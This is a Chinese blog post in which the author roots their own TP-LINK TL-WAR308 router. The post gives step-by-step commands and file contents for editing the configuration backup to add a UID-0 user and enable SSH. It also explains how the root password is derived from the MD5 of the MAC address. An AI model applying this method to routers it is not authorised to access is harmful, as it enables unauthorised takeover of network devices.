1055 字
5 分钟
通过TP-LINK WAR308备份文件提取漏洞获得路由器root权限
2024-11-09
CTF
Hardware
/
Router
/
TP-LINK
/
CTF

Ref: https://herowong.org/archives/a-special-experience-of-hacking-tplink-router.html

我在之前就发过文章,解决了学校校园网的设备限制问题,但是R2S存在一个问题,就是它没有WIFI,而有的时候就是需要那么点WIFI。正巧,我从某些地方薅了一些淘汰下来的路由回来,它们分别是TP-LINK TL-WDR5620Tenda AC5TP-LINK TL-WAR308

而我的要求是路由器必须得能刷openwrt来修改UA(不然一样会触发设备限制),经过在网上的一顿搜索后,对于三个路由器的情况分别是这样的

  • TL-WDR5620:能刷,但是要拆机用编程器
  • Tenda AC5:Openwrt官方明确说明不支持
  • TL-WAR308:自带定制版openwrt,但是没有权限

在没有编程器的情况下,我选择对TL-WAR308下手,然后我又开始高强度网上冲浪,终于找到了能够获取root权限的方法

破解基础#

我手上这个路由器的系统版本是1.2.1 Build 20190117 Rel.51148,硬件版本是v3.0

这个路由器存在一个备份配置文件的漏洞,具体来说就是在路由器的备份界面,备份当前用户配置的时候,会连同/etc/passwd/etc/shadow一起拉下来

并且这个路由器每次重启会自动修改root密码,root密码的生成跟路由器的MAC地址有关,这个脚本在/etc/config/dropbear,同样会被备份下来

而熟悉linux的小伙伴都知道,在/etc/passwd中储存在用户的信息,而在/etc/shadow中储存着用户加密过后的密码,这样就能给我们提供切入点了

添加用户并打开SSH#

添加用户#

备份文件的目录结构大概是这样的

backup.bin
 └ tmp
    └ userconfig
       ├ etc
       └ www

而我们直接打开etc文件夹的passwdshadow,加入我们的用户信息

tmp/userconfig/etc/passwd#

Terminal window
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
user:x:0:0::/home/user:/bin/ash

tmp/userconfig/etc/shadow#

Terminal window
root:$1$THIS_IS_A_FAKE_PASSWD:16800:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
user:$1$.4M0yZly$FNS0YgMD.hda5ASGmFUbY.:18722:0:99999:7:::

我把user的密码设置为了123456,接着我们还要打开ssh。根据参考文献,我们可以在etc/config/dropbear文件打开它

这个密码值是通过计算得到的:openssl passwd -1 123456

tmp/userconfig/etc/config/dropbear#

Terminal window
config dropbear
 option PasswordAuth 'on'
 option RootPasswordAuth 'on'
 option Port         '33400'
 option ssh_port_switch         'on'
# option BannerFile   '/etc/banner'

把那个ssh_port_switch改成on就能够打开了

打包配置文件#

通过file命令,我们可以看到这个文件的压缩方式

Terminal window
┌──(ctfos㉿Hello-CTF)-[/mnt/c/Users/HelloCTF_OS/Desktop/tp/backup-TP-LINK-2018-01-01]
└─$ file backup-TP-LINK-2018-01-01.bin
backup-TP-LINK-2018-01-01.bin: gzip compressed data, last modified: Sun Dec 31 16:06:24 2017, max compression, from Unix, original size modulo 2^32 663552

所以我们要用同样的压缩方式压缩回去,要不然会提示配置文件格式错误(别问我怎么知道的,因为我就那么干了)

我们逐步运行下面的命令

Terminal window
tar -cvf tmp.tar tmp
gzip -9 tmp.tar
mv tmp.tar.gz new_backup-gzip.bin

这样子,当我们运行file的时候就会发现,我们的文件格式一致了

Terminal window
┌──(ctfos㉿Hello-CTF)-[/mnt/c/Users/HelloCTF_OS/Desktop/tp/backup-TP-LINK-2018-01-01/backup-TP-LINK-2018-01-01]
└─$ file new_backup-gzip.bin
new_backup-gzip.bin: gzip compressed data, was "tmp.tar", last modified: Sat Nov  9 07:02:50 2024, max compression, from Unix, original size modulo 2^32 665600

然后回到路由器中,执行备份的还原操作

获得root密码#

此时我们再根据参考资料,找到/etc/init.d/dropbear,发现生成密码的方式

Terminal window
getNewPasswd()
{
        . /lib/functions.sh
        local macAddr=""
        macAddr=$(uci_get tddp macaddr macaddr)
        #echo "macAddr is $macAddr" > /dev/console


        local key=$(echo -n "$macAddr" | md5sum)
        key=$(echo ${key:0:8})
        #echo "key is $key" > /dev/console


        echo ${key}
}


setNewPasswd()
{
        local newPasswd=`getNewPasswd`
        #echo "newPasswd is $newPasswd" > /dev/console
        (echo "$newPasswd";sleep 1;echo "$newPasswd") | passwd > /dev/null
}

就是通过mac地址的md5运算后取前8位,所以就能够得到root密码了,我这里的root密码为b0b7e6e20

root账户登录#

使用我们刚刚获得的密码就可以进行登录了

查看了一下架构

Terminal window
root@TP-LINK:~# uname -a
Linux TP-LINK 3.3.8 #1 Thu Jan 17 14:11:22 CST 2019 mips GNU/Linux

然而这个版本的openwrt已经停止支持了,这个路由器在openwrt官网也没有找到官方的固件,再结合TPLINK的习惯,我感觉我没法用这个东西来编译ua2f,不过目前还没有触发学校网的限制,先用着再说吧

小工具#

经过我自己手上这台和各种不完全教程里面的dropbear,基本可以判定root的密码就是固定的算法,于是就写了一个计算root密码的小工具 => TP-LINK WAR308路由器root密码计算器

通过TP-LINK WAR308备份文件提取漏洞获得路由器root权限
https://bili33.top/posts/hacking-tl-war308-router-and-get-root-access/
作者
GamerNoTitle
发布于
2024-11-09
许可协议
CC BY-NC-SA 4.0
中国科学技术大学第十一届信息安全大赛(Hackgame2024)个人题解Writeup
【Volcania】2024第四届“网鼎杯”网络安全大赛青龙组初赛Writeup
© 2025 GamerNoTitle. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari